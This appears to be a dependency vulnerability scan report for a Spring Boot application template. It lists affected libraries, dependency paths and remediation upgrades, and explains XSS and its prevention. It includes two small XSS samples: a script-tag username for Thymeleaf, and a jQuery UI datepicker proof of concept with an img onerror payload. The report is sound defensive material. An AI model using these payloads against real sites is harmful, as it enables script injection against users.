  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long SpEL expression.

Remediation

Upgrade org.springframework:spring-expression to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: org.thymeleaf.extras:thymeleaf-extras-springsecurity5
  • Introduced through: org.thymeleaf.extras:thymeleaf-extras-springsecurity5@3.0.4.RELEASE

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.thymeleaf.extras:thymeleaf-extras-springsecurity5@3.0.4.RELEASE
    Remediation: Upgrade to org.thymeleaf.extras:thymeleaf-extras-springsecurity5@3.1.0.RELEASE.

Overview

org.thymeleaf.extras:thymeleaf-extras-springsecurity5 is a Modern server-side Java template engine for both web and standalone environments.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when creating a user with username <script type="text/javascript>alert("");</script> .

Details

A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade org.thymeleaf.extras:thymeleaf-extras-springsecurity5 to version 3.1.0.M1 or higher.

References

medium severity

Authentication Bypass Using an Alternate Path or Channel

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.13.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.13.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Authentication Bypass Using an Alternate Path or Channel due to how PreResources or PostResources handle pre-resources or post-resources mounted at non-root locations. An attacker can gain unauthorized access to protected resources by crafting requests to unexpected paths that bypass intended security constraints.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.106, 10.1.42, 11.0.8 or higher.

References

medium severity

Improper Handling of Case Sensitivity

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.12.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity in the pathInfo component of a URI mapped to the CGI servlet. An attacker can bypass security constraints that apply to the pathInfo component by exploiting this vulnerability on a case insensitive file system.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.105, 10.1.41, 11.0.7 or higher.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.lowagie:itext@2.1.7.js9 org.bouncycastle:bcprov-jdk15on@1.68

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the ASN1ObjectIdentifier. An attacker can cause excessive resource consumption by submitting specially crafted ASN.1 Object Identifiers, potentially leading to service disruption.

Note: This issue only applies to applications which do consume unvetted, or otherwise unvalidated, ASN.1 encodings.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.lowagie:itext@2.1.7.js9 org.bouncycastle:bcprov-jdk15on@1.68

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper processing of large name constraint structures in PKIXCertPathReviewer. An attacker can cause excessive resource allocation by submitting specially crafted ASN.1 objects, potentially leading to service disruption.

Workaround

This vulnerability can be mitigated by limiting the size of ASN.1 objects that can be loaded from untrusted sources, thereby capping the maximum size of a Name Constraints structure.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-config
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.

Overview

org.springframework.security:spring-security-config is a security configuration package for Spring Framework.

Affected versions of this package are vulnerable to Authorization Bypass due to the use of String.toLowerCase() and String.toUpperCase() that have Locale dependent exceptions, which results in authorization rules not working properly.

Remediation

Upgrade org.springframework.security:spring-security-config to version 5.7.14, 5.8.16, 6.2.8, 6.3.5 or higher.

References

medium severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass due to the use of String.toLowerCase() and String.toUpperCase() that have Locale dependent exceptions, which results in authorization rules not working properly.

Remediation

Upgrade org.springframework.security:spring-security-core to version 5.7.14, 5.8.16, 6.2.8, 6.3.5 or higher.

References

medium severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-crypto
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework.security:spring-security-crypto@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework.security:spring-security-crypto@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.

Overview

org.springframework.security:spring-security-crypto is a spring-security-crypto library for Spring Security.

Affected versions of this package are vulnerable to Authorization Bypass due to the use of String.toLowerCase() and String.toUpperCase() that have Locale dependent exceptions, which results in authorization rules not working properly.

Remediation

Upgrade org.springframework.security:spring-security-crypto to version 5.7.14, 5.8.16, 6.2.8, 6.3.5 or higher.

References

medium severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass due to the use of String.toLowerCase() and String.toUpperCase() that have Locale dependent exceptions, which results in authorization rules not working properly.

Remediation

Upgrade org.springframework.security:spring-security-web to version 5.7.14, 5.8.16, 6.2.8, 6.3.5 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: org.webjars.bower:jquery-ui
  • Introduced through: org.webjars.bower:jquery-ui@1.12.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.webjars.bower:jquery-ui@1.12.1

Overview

org.webjars.bower:jquery-ui is a library for manipulating UI elements via jQuery.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when accepting the value of altField option of the Datepicker widget from untrusted sources, which may lead to execution of untrusted code.

POC

Initializing the 'datepicker' in the following way:

$( "#datepicker" ).datepicker( {
    altField: "<img onerror='doEvilThing()' src='/404' />",
} );

will call the doEvilThing function.

Details

